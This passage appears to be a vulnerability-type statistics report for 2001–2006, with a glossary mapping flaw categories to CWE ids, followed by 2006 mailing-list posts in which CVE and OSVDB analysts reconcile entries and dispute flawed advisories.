[ 7]  dos-malform  OS-ven  03.7%  05.6% ( 3)  06.1% ( 2)  02.7% ( 4)  04.5% ( 4)  01.8% ( 7)  03.3% ( 4)
                           162  25  40  14  33  22  28
                   Other   02.6%  04.4% ( 5)  04.7% ( 5)  02.3% ( 8)  03.0% ( 6)  01.8% ( 8)  01.6% ( 7)
                           301  44  70  15  54  60  58
[ 8]  link  OS-ven  04.0%  07.4% ( 2)  03.3% ( 4)  04.0% ( 2)  05.2% ( 2)  04.0% ( 3)  01.8% ( 5)
                    177  33  22  21  38  48  15
            Other   01.3%  03.1% ( 7)  01.6% (13)  03.1% ( 7)  01.9% ( 9)  01.2% (11)  00.1% (25)
                    152  31  23  20  34  39  5
[ 9]  format-string  OS-ven  02.4%  05.2% ( 4)  01.5% (10)  02.3% ( 6)  02.6% ( 5)  02.4% ( 5)  01.6% ( 6)
                             107  23  10  12  19  29  14
                     Other   01.6%  02.3% ( 9)  02.0% (11)  03.1% ( 6)  02.3% ( 7)  01.4% ( 9)  00.8% (12)
                             189  23  29  20  42  47  28
[10]  crypt  OS-ven  00.8%  01.6% (12)  01.4% (11)  01.1% ( 9)  00.4% (19)  00.4% (16)  00.5% (15)
                     34  7  9  6  3  5  4
             Other   01.9%  04.8% ( 3)  03.3% ( 6)  01.9% ( 9)  01.1% (14)  01.9% ( 7)  01.0% (10)
                     227  48  49  12  19  63  36
[11]  priv  OS-ven  02.0%  04.1% ( 5)  02.3% ( 6)  00.8% (16)  00.8% (13)  02.6% ( 4)  01.6% ( 7)
                    88  18  15  4  6  31  14
            Other   01.2%  01.8% (12)  02.1% (10)  01.2% (14)  01.4% (11)  01.1% (12)  00.7% (13)
                    145  18  31  8  26  36  26
[12]  metachar  OS-ven  01.2%  02.0% (10)  02.6% ( 5)  00.8% (15)  00.7% (17)  01.3% (12)  00.4% (19)
                        53  9  17  4  5  15  3
                Other   01.4%  04.6% ( 4)  02.6% ( 7)  00.6% (20)  01.2% (13)  01.3% (10)  00.3% (21)
                        165  46  39  4  21  44  11
[13]  perm  OS-ven  01.8%  04.1% ( 6)  02.1% ( 7)  01.1% ( 7)  01.1% (10)  01.7% ( 8)  01.4% ( 9)
                    78  18  14  6  8  20  12
            Other   01.2%  02.1% (10)  01.7% (12)  01.4% (12)  00.9% (15)  00.8% (15)  01.1% ( 9)
                    137  21  25  9  16  28  38
[14]  int-overflow  OS-ven  02.7%  ...  01.2% (12)  02.3% ( 5)  04.6% ( 3)  02.1% ( 6)  04.7% ( 3)
                            119  0  8  12  34  25  40
                    Other   00.3%  00.1% (31)  ...  00.6% (18)  00.7% (17)  00.3% (21)  00.3% (17)
                            41  1  0  4  13  11  12
[15]  dos-flood  OS-ven  00.6%  02.5% ( 8)  00.6% (18)  00.2% (27)  00.3% (21)  00.3% (26)  00.8% (12)
                         28  11  4  1  2  3  7
                 Other   00.9%  01.8% (11)  02.2% ( 9)  00.8% (17)  01.6% (10)  00.2% (23)  00.3% (18)
                         103  18  32  5  29  7  12
[16]  pass  OS-ven  00.5%  00.2% (25)  00.8% (17)  00.2% (26)  00.8% (15)  00.3% (20)  00.5% (17)
                    21  1  5  1  6  4  4
            Other   00.9%  01.5% (16)  01.5% (14)  00.2% (27)  01.2% (12)  01.0% (14)  00.3% (16)
                    104  15  22  1  22  32  12
[17]  auth  OS-ven  00.5%  01.4% (15)  01.1% (14)  00.6% (17)  00.3% (20)  00.3% (23)  00.2% (23)
                    24  6  7  3  2  4  2
            Other   00.8%  01.6% (13)  01.4% (15)  00.5% (22)  00.8% (16)  00.5% (17)  00.8% (11)
                    100  16  20  3  15  17  29
[18]  webroot  OS-ven  00.0%  ...  ...  ...  ...  ...  00.1% (28)
                       1  0  0  0  0  0  1
               Other   00.7%  00.2% (28)  00.3% (26)  00.5% (21)  00.3% (26)  01.0% (13)  01.1% ( 8)
                       87  2  5  3  5  33  39
[19]  form-field  OS-ven  00.2%  00.5% (22)  00.3% (26)  00.2% (21)  ...  00.4% (18)  ...
                          10  2  2  1  0  5  0
                  Other   00.6%  00.8% (20)  01.0% (16)  00.8% (15)  00.3% (23)  00.4% (18)  00.7% (14)
                          71  8  15  5  6  14  23
[20]  relpath  OS-ven  00.6%  01.6% (11)  00.3% (25)  00.4% (19)  01.1% ( 8)  00.3% (27)  00.7% (13)
                       28  7  2  2  8  3  6
               Other   00.4%  00.5% (25)  00.3% (27)  01.2% (13)  00.3% (22)  00.4% (19)  00.2% (22)
                       43  5  4  8  6  12  8
[21]  race  OS-ven  01.0%  01.1% (17)  00.9% (16)  00.4% (18)  01.0% (12)  01.6% ( 9)  00.7% (14)
                    45  5  6  2  7  19  6
            Other   00.2%  00.2% (29)  00.1% (29)  00.8% (16)  00.2% (30)  00.2% (27)  00.1% (24)
                    24  2  2  5  3  7  5
[22]  memleak  OS-ven  00.8%  02.0% ( 9)  00.6% (20)  00.8% (13)  01.0% (11)  00.9% (14)  00.2% (25)
                       37  9  4  4  7  11  2
               Other   00.2%  00.7% (22)  00.1% (33)  00.2% (29)  00.3% (19)  00.1% (30)  00.1% (26)
                       24  7  1  1  6  4  5
[23]  msdos-device  OS-ven  00.0%  ...  ...  ...  ...  ...  ...
                            0  0  0  0  0  0  0
                    Other   00.5%  01.5% (15)  00.9% (17)  01.7% (10)  00.3% (21)  00.3% (22)  00.1% (31)
                            57  15  13  11  6  10  2
[24]  crlf  OS-ven  00.2%  ...  00.5% (23)  00.2% (25)  ...  00.4% (17)  00.2% (24)
                    11  0  3  1  0  5  2
            Other   00.3%  ...  00.1% (34)  ...  00.7% (18)  00.4% (20)  00.3% (19)
                    38  0  1  0  13  12  12
[25]  spoof  OS-ven  00.2%  00.2% (28)  00.3% (29)  ...  ...  00.3% (21)  00.5% (16)
                     11  1  2  0  0  4  4
             Other   00.3%  01.4% (17)  00.3% (25)  00.2% (28)  00.2% (29)  00.2% (25)  00.2% (23)
                     37  14  5  1  3  7  7
[26]  default  OS-ven  00.2%  00.2% (26)  00.5% (24)  ...  00.1% (22)  00.3% (25)  00.2% (26)
                       10  1  3  0  1  3  2
               Other   00.3%  01.5% (14)  00.9% (18)  00.2% (26)  00.3% (27)  ...  00.1% (29)
                       38  15  13  1  5  0  4
[27]  sandbox  OS-ven  00.7%  02.7% ( 7)  02.1% ( 8)  ...  00.1% (24)  00.2% (28)  ...
                       29  12  14  0  1  2  0
               Other   00.1%  00.5% (24)  00.5% (20)  ...  00.2% (28)  ...  ...
                       17  5  8  0  4  0  0
[28]  rand  OS-ven  00.3%  01.4% (16)  00.5% (22)  00.2% (23)  00.1% (23)  ...  00.2% (22)
                    13  6  3  1  1  0  2
            Other   00.3%  01.1% (18)  00.6% (19)  00.3% (23)  00.2% (32)  00.1% (32)  00.1% (28)
                    32  11  9  2  3  2  5
[29]  upload  OS-ven  00.0%  ...  ...  ...  ...  00.1% (32)  ...
                      1  0  0  0  0  1  0
              Other   00.4%  ...  00.1% (32)  00.2% (30)  00.3% (20)  00.6% (16)  00.4% (15)
                      42  0  1  1  6  21  13
[30]  signedness  OS-ven  00.5%  00.2% (24)  00.9% (15)  00.9% (12)  00.4% (18)  00.6% (15)  00.2% (20)
                          24  1  6  5  3  7  2
                  Other   00.1%  ...  00.1% (30)  00.6% (19)  00.2% (31)  00.1% (28)  ...
                          14  0  2  4  3  5  0
[31]  dos-release  OS-ven  00.2%  00.9% (19)  00.3% (30)  00.2% (20)  ...  ...  ...
                           7  4  2  1  0  0  0
                   Other   00.2%  00.9% (19)  00.5% (21)  00.2% (25)  00.3% (25)  ...  ...
                           23  9  8  1  5  0  0
[32]  CF  OS-ven  00.2%  00.9% (18)  00.2% (31)  00.2% (24)  ...  ...  00.1% (29)
                  7  4  1  1  0  0  1
          Other   00.2%  00.6% (23)  00.4% (23)  00.2% (24)  ...  00.1% (29)  00.1% (27)
                  22  6  6  1  0  4  5
[33]  eval-inject  OS-ven  00.1%  ...  ...  ...  ...  00.3% (22)  00.2% (21)
                           6  0  0  0  0  4  2
                   Other   00.2%  ...  ...  ...  00.1% (34)  00.2% (26)  00.3% (20)
                           19  0  0  0  1  7  11
[34]  design  OS-ven  00.1%  00.2% (23)  00.3% (27)  00.2% (22)  ...  00.1% (30)  ...
                      5  1  2  1  0  1  0
              Other   00.2%  00.7% (21)  00.4% (24)  ...  00.1% (33)  00.1% (31)  00.1% (32)
                      18  7  6  0  1  2  2
[35]  double-free  OS-ven  00.4%  ...  00.3% (28)  00.8% (14)  00.8% (14)  00.3% (24)  00.4% (18)
                           19  0  2  4  6  4  3
                   Other   00.0%  ...  ...  ...  ...  00.0% (33)  00.0% (33)
                           2  0  0  0  0  1  1
[36]  type-check  OS-ven  00.2%  00.7% (21)  00.6% (21)  ...  ...  00.1% (31)  ...
                          8  3  4  0  0  1  0
                  Other   00.1%  00.3% (27)  00.3% (28)  ...  ...  ...  00.0% (34)
                          8  3  4  0  0  0  1
[37]  CSRF  OS-ven  00.0%  ...  ...  ...  ...  00.1% (29)  ...
                    1  0  0  0  0  1  0
            Other   00.1%  ...  00.1% (31)  ...  00.3% (24)  00.2% (24)  00.1% (30)
                    15  0  1  0  5  7  2
UNKNOWN/UNSPECIFIED ITEMS
n/a  unk  OS-ven  16.0%  12.4%  12.6%  10.4%  12.2%  16.1%  27.2%
                  708  55  83  55  90  193  232
          Other   06.4%  06.0%  04.6%  04.2%  06.6%  06.3%  07.7%
                  752  59  68  27  119  209  270
n/a  other  OS-ven  16.4%  15.3%  15.6%  12.0%  12.2%  14.4%  26.6%
                    724  68  103  63  90  173  227
            Other   14.8%  17.3%  20.6%  11.8%  19.2%  12.6%  12.1%
                    1744  171  304  76  345  422  426
n/a  not-specified  OS-ven  14.3%  00.2%  05.9%  26.0%  24.6%  22.2%  00.8%
                            631  1  39  137  181  266  7
                    Other   04.2%  00.1%  01.8%  15.9%  05.8%  07.4%  00.2%
                            490  1  27  103  105  247  7

Top 5 / 10 Percentages per year

For the 'top N' vulnerabilities in each year, the table identifies the total percentage of overall vulnerabilities. For example, a figure of 45.0 for Top 5 says that the Top 5 accounted for 45% of all reported vulnerabilities in that year.

Top n  Group   TOTAL  2001  2002  2003  2004  2005  2006
5      OS-ven  33.8  43.3  43.2  36.9  37.3  29.4  30.6
       Other   50.9  44.7  45  44.2  45.6  55.1  65.4
10     OS-ven  42.6  56.6  52.7  43.6  43.6  37.9  38
       Other   62.5  58  57.5  56.3  56.4  64.2  73.2


Table 4: Open and Closed Source (OS vendors)

Rank  Flaw  Group  TOTAL  2001  2002  2003  2004  2005  2006
Total  Open    raw numbers omitted
       Closed  raw numbers omitted
[ 1]  buf  Open    19.7%  20.3% ( 1)  24.6% ( 1)  25.0% ( 1)  24.5% ( 1)  14.6% ( 1)  17.1% ( 1)
           Closed  20.4%  20.3% ( 1)  27.7% ( 1)  26.1% ( 1)  15.3% ( 1)  18.5% ( 1)  16.3% ( 1)
[ 2]  link  Open    06.4%  14.0% ( 2)  04.8% ( 3)  04.9% ( 2)  08.6% ( 2)  06.1% ( 2)  02.4% ( 5)
            Closed  01.6%  01.0% (17)  01.8% ( 9)  03.0% ( 2)  01.9% ( 5)  00.8% ( 7)  01.6% ( 6)
[ 3]  dos-malform  Open    02.8%  02.7% ( 7)  04.4% ( 4)  02.6% ( 6)  03.5% ( 5)  01.7% ( 8)  03.3% ( 4)
                   Closed  05.3%  09.2% ( 2)  08.1% ( 2)  02.5% ( 3)  07.3% ( 2)  02.1% ( 3)  03.9% ( 3)
[ 4]  XSS  Open    04.6%  02.7% ( 8)  05.9% ( 2)  03.0% ( 5)  01.4% (10)  05.5% ( 3)  07.1% ( 2)
           Closed  02.3%  00.5% (22)  03.6% ( 4)  02.5% ( 4)  00.8% ( 8)  02.1% ( 4)  03.2% ( 4)
[ 5]  format-string  Open    04.0%  08.6% ( 3)  02.9% ( 6)  03.0% ( 4)  04.9% ( 3)  03.7% ( 4)  02.4% ( 6)
                     Closed  00.8%  01.4% (13)  00.6% (17)  02.0% ( 5)  00.4% (18)  00.8% (10)  00.3% (17)
[ 6]  int-overflow  Open    02.6%  ...  02.2% ( 7)  03.4% ( 3)  04.0% ( 4)  02.2% ( 7)  03.5% ( 3)
                    Closed  01.7%  ...  ...  01.0% ( 7)  03.4% ( 3)  00.8% ( 8)  04.2% ( 2)
[ 7]  priv  Open    02.3%  05.4% ( 4)  01.8% ( 8)  01.5% (12)  01.2% (11)  02.3% ( 5)  02.2% ( 7)
            Closed  01.8%  01.9% ( 8)  03.0% ( 6)  ...  00.4% (16)  03.4% ( 2)  00.8% (13)
[ 8]  perm  Open    02.2%  05.4% ( 5)  01.1% (13)  01.9% ( 8)  01.7% ( 7)  02.3% ( 6)  01.4% ( 9)
            Closed  01.6%  02.4% ( 6)  03.3% ( 5)  00.5% (11)  00.4% (12)  00.8% (12)  01.8% ( 5)
[ 9]  dot  Open    01.5%  00.5% (18)  01.8% ( 9)  01.1% (15)  02.0% ( 6)  01.4% (12)  01.6% ( 8)
           Closed  01.2%  01.9% (10)  00.9% (13)  01.0% ( 9)  01.5% ( 7)  00.5% (18)  01.6% ( 7)
[10]  infoleak  Open    01.1%  00.5% (19)  01.5% (12)  01.1% (13)  01.2% (12)  01.0% (14)  01.4% (10)
                Closed  01.1%  01.4% (12)  00.9% (12)  01.0% ( 8)  00.4% (17)  01.6% ( 5)  01.1% (10)
[11]  metachar  Open    01.5%  03.2% ( 6)  02.9% ( 5)  01.5% (11)  00.6% (15)  01.4% (11)  00.5% (15)
                Closed  00.5%  01.0% (18)  01.2% (11)  ...  00.4% (14)  00.5% (15)  ...
[12]  race  Open    01.4%  02.3% ( 9)  01.8% (10)  00.4% (19)  01.7% ( 8)  01.6% ( 9)  00.8% (13)
            Closed  00.3%  ...  ...  00.5% (10)  ...  00.8% (14)  00.3% (21)
[13]  sql-inject  Open    01.2%  00.5% (21)  00.7% (18)  01.9% ( 9)  00.9% (13)  01.6% (10)  01.4% (11)
                  Closed  00.4%  ...  00.6% (18)  00.5% (20)  00.4% (13)  ...  00.8% (14)
[14]  memleak  Open    00.9%  ...  00.7% (16)  01.1% (14)  01.4% ( 9)  01.2% (13)  00.3% (24)
               Closed  00.9%  04.3% ( 4)  00.3% (19)  00.5% (12)  ...  00.8% (13)  00.3% (19)
[15]  crypt  Open    00.7%  01.8% (11)  00.7% (15)  01.9% ( 7)  ...  00.4% (18)  00.3% (21)
             Closed  00.9%  01.0% (16)  02.1% ( 7)  ...  00.8% (11)  00.5% (16)  00.5% (15)
[16]  sandbox  Open    00.2%  00.5% (15)  ...  ...  00.3% (20)  00.3% (23)  ...
               Closed  01.4%  05.3% ( 3)  04.2% ( 3)  ...  ...  ...  ...
[17]  dos-flood  Open    00.3%  01.4% (12)  00.4% (24)  ...  ...  00.3% (24)  ...
                 Closed  01.1%  03.9% ( 5)  00.9% (14)  00.5% (14)  00.8% ( 9)  00.3% (19)  01.3% ( 8)
[18]  relpath  Open    00.6%  01.8% (10)  00.7% (17)  00.4% (18)  00.3% (16)  00.4% (19)  00.5% (18)
               Closed  00.7%  01.4% (14)  ...  00.5% (13)  01.9% ( 6)  ...  01.1% (12)
[19]  auth  Open    00.1%  00.5% (16)  ...  ...  00.3% (17)  ...  00.3% (20)
            Closed  01.2%  02.4% ( 7)  02.1% ( 8)  01.5% ( 6)  00.4% (15)  01.0% ( 6)  00.3% (18)
[20]  pass  Open    00.0%  ...  ...  ...  ...  00.1% (28)  ...
            Closed  01.1%  00.5% (20)  01.5% (10)  00.5% (16)  02.3% ( 4)  00.8% (11)  01.1% ( 9)
[21]  signedness  Open    00.8%  00.5% (17)  01.8% (11)  01.5% (10)  00.3% (19)  00.6% (17)  00.5% (16)
                  Closed  00.2%  ...  ...  00.5% (17)  ...  00.5% (17)  ...
[22]  double-free  Open    00.6%  ...  00.4% (22)  01.1% (16)  00.9% (14)  00.3% (25)  00.8% (12)
                   Closed  00.2%  ...  ...  00.5% (19)  00.8% (10)  00.3% (21)  ...
[23]  spoof  Open    00.2%  ...  00.7% (20)  ...  ...  00.4% (21)  ...
             Closed  00.3%  00.5% (23)  ...  ...  ...  00.3% (20)  01.1% (11)
[24]  form-field  Open    00.4%  00.5% (20)  00.7% (19)  00.4% (20)  ...  00.7% (16)  ...
                  Closed  00.1%  00.5% (21)  ...  ...  ...  ...  ...
[25]  crlf  Open    00.5%  ...  01.1% (14)  ...  ...  00.7% (15)  00.5% (17)
            Closed  00.0%  ...  ...  ...  ...  ...  ...
[26]  rand  Open    00.2%  00.9% (13)  00.4% (21)  00.4% (17)  ...  ...  00.3% (22)
            Closed  00.3%  01.9% ( 9)  00.3% (22)  ...  ...  ...  ...
[27]  default  Open    00.1%  ...  ...  ...  00.3% (18)  ...  00.3% (23)
               Closed  00.4%  00.5% (24)  00.6% (16)  ...  ...  00.8% ( 9)  00.3% (16)
[28]  dos-release  Open    00.1%  00.5% (22)  00.4% (23)  00.4% (21)  ...  ...  ...
                   Closed  00.2%  01.4% (11)  00.3% (21)  ...  ...  ...  ...
[29]  type-check  Open    00.0%  ...  ...  ...  ...  00.1% (26)  ...
                  Closed  00.3%  01.4% (15)  00.9% (15)  ...  ...  ...  ...
[30]  CF  Open    00.1%  00.9% (14)  ...  ...  ...  ...  ...
          Closed  00.2%  01.0% (19)  ...  00.5% (18)  ...  ...  00.3% (22)
[31]  eval-inject  Open    00.2%  ...  ...  ...  ...  00.4% (20)  00.5% (14)
                   Closed  00.0%  ...  ...  ...  ...  ...  ...
[32]  php-include  Open    00.2%  ...  ...  ...  ...  00.4% (22)  00.3% (19)
                   Closed  00.0%  ...  ...  ...  ...  ...  ...
[33]  design  Open    00.0%  ...  ...  ...  ...  ...  ...
              Closed  00.2%  00.5% (25)  00.3% (20)  00.5% (15)  ...  00.3% (22)  ...
[34]  webroot  Open    00.0%  ...  ...  ...  ...  ...  ...
               Closed  00.1%  ...  ...  ...  ...  ...  00.3% (20)
[35]  upload  Open    00.0%  ...  ...  ...  ...  00.1% (29)  ...
              Closed  00.0%  ...  ...  ...  ...  ...  ...
[36]  CSRF  Open    00.0%  ...  ...  ...  ...  00.1% (27)  ...
            Closed  00.0%  ...  ...  ...  ...  ...  ...
UNKNOWN/UNSPECIFIED ITEMS
n/a  unk  Open    09.7%  12.2%  10.3%  04.5%  07.8%  11.5%  10.1%
          Closed  25.7%  13.0%  15.7%  20.1%  23.0%  26.9%  45.0%
n/a  other  Open    19.3%  13.1%  20.6%  15.7%  10.4%  15.9%  39.4%
            Closed  12.4%  18.8%  12.7%  05.0%  14.9%  10.7%  12.4%
n/a  not-specified  Open    13.4%  00.0%  04.4%  21.6%  21.9%  20.5%  00.8%
                    Closed  13.2%  00.5%  06.3%  28.6%  22.6%  24.3%  00.5%

Top 5 / 10 Percentages per year

For the 'top N' vulnerabilities in each year, the table identifies the total percentage of overall vulnerabilities. For example, a figure of 45.0 for Top 5 says that the Top 5 accounted for 45% of all reported vulnerabilities in that year.

Top n  Group   TOTAL  2001  2002  2003  2004  2005  2006
5      Open    37.5  53.7  42.6  39.3  45.5  32.2  33.4
       Closed  31.5  43  46.9  36.1  30.2  27.7  29.4
10     Open    47.6  66.4  53.1  49.1  53.7  41.6  42.4
       Closed  38.5  53.5  57.4  41.1  36  31.9  36.1


Flaw Terminology

Type  Description
auth Weak/bad authentication problem (CWE: CWE-289, CWE-288, CWE-302, CWE-305, CWE-294, CWE-290, CWE-287, CWE-303)
buf Buffer overflow (CWE: CWE-119, CWE-120)
CF General configuration problem, not perm or default (CWE: none)
crlf CRLF injection (CWE: CWE-93)
crypt Cryptographic error (poor design or implementation), including plaintext storage/transmission of sensitive information. (CWE: CWE-310, CWE-311, CWE-347, CWE-320, CWE-325)
CSRF Cross-Site Request Forgery (CSRF) (CWE: CWE-352)
default Insecure default configuration, e.g., passwords or permissions (CWE: N/A)
design Design problem, generally in protocols or programming languages. Since 2005, its use has been limited due to the highly general nature of this type. (CWE: none)
dos-flood DoS caused by flooding with a large number of *legitimately formatted* requests/etc.; normally DoS is a crash, or spending a lot more time on a task than it "should" (CWE: CWE-400)
dos-malform DoS caused by malformed input (CWE: CWE-238, CWE-234, CWE-166, CWE-230, many others)
dos-release DoS because system does not properly release resources (CWE: CWE-404)
dot Directory traversal (file access via ".." or variants) (CWE: CWE-22, CWE-23, CWE-36)
double-free Double-free vulnerability (CWE: CWE-415)
eval-inject Eval injection (CWE: CWE-95)
form-field CGI program inherently trusts form field that should not be modified (i.e., should be stored locally) (CWE: CWE-472)
format-string Format string vulnerability; user can inject format specifiers during string processing. (CWE: CWE-134)
infoleak Information leak by a product, which is not the result of another vulnerability; typically by design or by producing different "answers" that suggest the state; often related to configuration / permissions or error reporting/handling. (CWE: CWE-205, CWE-212, CWE-203, CWE-209, CWE-207, CWE-200, CWE-215, others)
int-overflow A numeric value can be incremented to the point where it overflows and begins at the minimum value, with security implications. Overlaps signedness errors. (CWE: CWE-190)
link Symbolic link following (CWE: CWE-61, CWE-64)
memleak Memory leak (doesn't free memory when it should); use this instead of dos-release (CWE: CWE-401)
metachar Unescaped shell metacharacters or other unquoted "special" char's; currently includes SQL injection but not XSS. (CWE: CWE-78)
msdos-device Problem due to file names with MS-DOS device names. (CWE: CWE-67)
not-specified The CVE analyst has not assigned a flaw type to the issue, typically similar to "other". (CWE: none)
other Other vulnerability; issue could not be described with an available type at the time of analysis. (CWE: none)
pass Default or hard-coded password (CWE: CWE-259)
perm Assigns bad permissions, improperly calculates permissions, or improperly checks permissions (CWE: CWE-276)
php-include PHP remote file inclusion (CWE: CWE-98)
priv Bad privilege assignment, or privileged process/action is unprotected/unauthenticated. (CWE: CWE-266, CWE-274, CWE-272, CWE-250, CWE-264, CWE-265, CWE-268, CWE-270, CWE-271, CWE-269, CWE-267)
race General race condition (NOT SYMBOLIC LINK FOLLOWING (link)!) (CWE: CWE-362, CWE-366, CWE-364, CWE-367, CWE-421, CWE-368, CWE-363, CWE-370)
rand Generation of insufficiently random numbers, typically by using easily guessable sources of "random" data (CWE: CWE-330, CWE-331, CWE-332, CWE-338, CWE-342, CWE-341, CWE-339, others)
relpath Untrusted search path vulnerability - Relies on search paths to find other executable programs or files, opening up to Trojan horse attacks, e.g., PATH environment variable in Unix. (CWE: CWE-426, CWE-428, CWE-114)
sandbox Java/etc. sandbox escape - NOT BY DOT-DOT! (CWE: CWE-265)
signedness Signedness error; a numeric value in one format/representation is improperly handled when it is used as if it were another format/representation. Overlaps integer overflows and array index errors. (CWE: CWE-195, CWE-196)
spoof Product is vulnerable to spoofing attacks, generally by not properly verifying authenticity. (CWE: CWE-290, CWE-350, CWE-347, CWE-345, CWE-247, CWE-292, CWE-291)
sql-inject SQL injection vulnerability (CWE: CWE-89)
type-check Product incorrectly identifies the type of an input parameter or file, then dispatches the wrong "executable" (possibly itself) to process the input, or otherwise misrepresents the input in a security-critical way. (CWE: unknown)
unk Unknown vulnerability; report is too vague to determine type of issue. (CWE: none)
upload Product does not restrict the extensions for files that can be uploaded to the web server, leading to code execution if executable extensions are used in filenames, such as .asp, .php, and .shtml. (CWE: CWE-434)
webroot Storage of sensitive data under web document root with insufficient access control. (CWE: CWE-219, CWE-433)
XSS Cross-site scripting (aka XSS) (CWE: CWE-79, CWE-80, CWE-87, CWE-85, CWE-82, CWE-81, CWE-83, CWE-84)
From jericho at attrition.org Thu Oct 5 04:57:27 2006 From: jericho at attrition.org (security curmudgeon) Date: Thu, 5 Oct 2006 04:57:27 -0400 (EDT) Subject: [VIM] CVE-2006-4030 - Gallery Stats Module Message-ID: Finally! This CVE has been locked for ages now, taunting me on the OSVDB backend.. waiting to find out what it cross references to =) CVE-2006-4030 Unspecified vulnerability in the stats module in Gallery 1.5.1-RC2 and earlier allows remote attackers to obtain sensitive information via unspecified attack vectors, related to "two file exposure bugs." Based on "Gallery" + "Stats Module" + "1.5.1-RC2", this should track to OSVDB 19159: 19159: The Gallery Stats Module Unspecified File Disclosure 2005-09-01 http://gallery.sourceforge.net/ http://cvs.sourceforge.net/viewcvs.py/gallery/gallery/ChangeLog?rev=HEAD&content-type=text/vnd.viewcvs-markup Changelog: 2005-08-24 Jay Rossiter 1.5.1-RC3-cvs-b13 * Fix: Prevent file exposure bug in stats module (thanks to ilia) -- Now, CVE-2006-4030 says "two file exposure bugs" and the changelog says "file exposure bug" (singular). Looking at the debian bug report we see: Date: Sat, 27 Aug 2005 17:21:56 +0000 Changes: gallery (1.5-2) unstable; urgency=high * SECURITY: + Fix two file exposure bugs in stats module. So.. i'd hazard a guess that the Gallery developers/author noticed one file exposure bug back on 2005-08-24 and fixed it, but a closer inspection a few days later found a second? Also, CVE-2006-4030 tracks to Secunia 16594 which mentions a single file disclosure vuln. So, for OSVDB, i'm keeping our 19159 entry to track to the first of the two issues, dated 2005-08-24 (changelog), and creating a new one (29350) that will cross with CVE-2006-4030 dated 2005-08-27 (other changelog/debian bug comment). From coley at linus.mitre.org Fri Oct 6 14:08:09 2006 From: coley at linus.mitre.org (Steven M. 
Christey) Date: Fri, 6 Oct 2006 14:08:09 -0400 (EDT) Subject: [VIM] WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit (fwd) Message-ID: ---------- Forwarded message ---------- Date: Fri, 6 Oct 2006 14:05:11 -0400 (EDT) From: Steven M. Christey To: bugtraq at securityfocus.com Subject: Re: WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit There are some important errors in this post that appear to stem from incomplete editing of a previous advisory for an unrelated product, webnews (CVE-2006-5100). The subject line says 1.4, but the version referenced at the end of the post is 1.2.3, which is dated October 2, 2006; so there doesn't appear to be any 1.4. The subject line also mentions WN_BASEDIR, but the demonstration exploit uses includeDir instead. - Steve From coley at linus.mitre.org Mon Oct 9 12:27:24 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 9 Oct 2006 12:27:24 -0400 (EDT) Subject: [VIM] Concerning CVE-2006-5078 (fwd) Message-ID: FYI, also: http://sourceforge.net/forum/forum.php?forum_id=620481 ---------- Forwarded message ---------- Date: Mon, 09 Oct 2006 14:37:32 +0000 From: Kristian Niemi To: cve at mitre.org Subject: Concerning CVE-2006-5078 Hi, Just saw the vulnerability report (CVE-2006-5078) concerning my project, Polaring. As of 00.04.04, released today, this should be fixed. /Kristian From coley at linus.mitre.org Mon Oct 9 15:30:19 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 9 Oct 2006 15:30:19 -0400 (EDT) Subject: [VIM] net2ftp: a web based FTP client :) <= Remote File Inclusion (fwd) Message-ID: CVE dispute, but with a little more detail than "there's no issue." File this under the growing collection of "really bad research or really obscure PHP bug". - Steve ---------- Forwarded message ---------- Date: Mon, 9 Oct 2006 15:26:20 -0400 (EDT) From: Steven M. 
Christey To: securfrog at gmail.com Cc: bugtraq at securityfocus.com Subject: Re: net2ftp: a web based FTP client :) <= Remote File Inclusion

securfrog said:

> i guess you should learn some PHP before posting on bugtracks ...
>
> " net2ftp: a web based FTP client :) <= Remote File Inclusion "
>
> ===> you should try your PoC before posting , there's no remote file
> include in that code ...

You are probably looking at recent versions, which don't have the affected code at all. The statements as quoted by the original researcher *do* appear in versions of net2ftp before 0.7:

  ./net2ftp_v0.1/index.php:require_once($application_rootdir . "/includes/browse.inc.php");
  ./net2ftp_v0.2/index.php:require_once($application_rootdir . "/includes/browse.inc.php");
  ./net2ftp_v0.3/index.php:require_once($application_rootdir . "/includes/browse.inc.php");
  ./net2ftp_v0.4/index.php:require_once($application_rootdir . "/includes/browse.inc.php");
  ./net2ftp_v0.6/index.php:require_once($application_rootdir . "/includes/browse.inc.php");
  ./net2ftp_v0.62/index.php:require_once($application_rootdir . "/includes/browse.inc.php");
  ./net2ftp_v0.61/index.php:require_once($application_rootdir . "/includes/browse.inc.php");
  ./net2ftp_v0.7/index.php:require_once("./includes/browse.inc.php");

Notice how 0.7 doesn't use $application_rootdir.

For these older versions, we need to figure out where $application_rootdir came from and if it's controlled by the attacker at all.

In net2ftp_v0.62, settings.inc.php is included by index.php before $application_rootdir, and settings.inc.php has:

  $application_rootdir = dirname(__FILE__);

So, $application_rootdir should already be defined.

In 0.1, settings.inc.php has:

  $server_rootdir = "/var/www/php/net2ftp"; // <-- The directory in which the net2ftp application files reside
  ...
  $application_extension = ""; // (Do not use this, it is only for development purposes)
  ...
  $application_rootdir = $server_rootdir . $application_extension;

So, $application_rootdir is defined in 0.1, too.

Given the large number of reports like this, it's not clear whether a bunch of researchers are making erroneous grep-and-gripe claims without checking their work, or if there's some obscure PHP scoping bug that somehow allows variables to be overwritten in weird ways. I haven't completely ruled out the latter but don't have any hard proof, either.

- Steve

From coley at linus.mitre.org Mon Oct 9 15:53:34 2006 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 9 Oct 2006 15:53:34 -0400 (EDT) Subject: [VIM] net2ftp: a web based FTP client :) <= Remote File Inclusion (fwd) In-Reply-To: References: Message-ID:

Just to make the plot thicker:

http://www.net2ftp.org/forums/viewtopic.php?pid=6687

The vendor says "These reports are based on net2ftp versions 0.60 to 0.62, which were released more than 3 years ago, in May-July 2003. The newer versions of net2ftp are not vulnerable to a remote file inclusion."

Then the code for admin/index.php (not the original index.php) is apparently listed. It's not clear whether the vendor is actually acknowledging the issue, or just saying "the newer versions don't have it."

I sucked it up, registered, and posted the following inquiry:

Hello, I am the lead for the CVE vulnerability project. We assigned CVE-2006-5097 to this issue. Isn't $application_rootdir already defined in "settings.inc.php", which is included by index.php? So how could an attacker actually modify $application_rootdir ? It's not clear to me where the vulnerability is.

- Steve

From coley at mitre.org Tue Oct 10 14:17:53 2006 From: coley at mitre.org (Steven M.
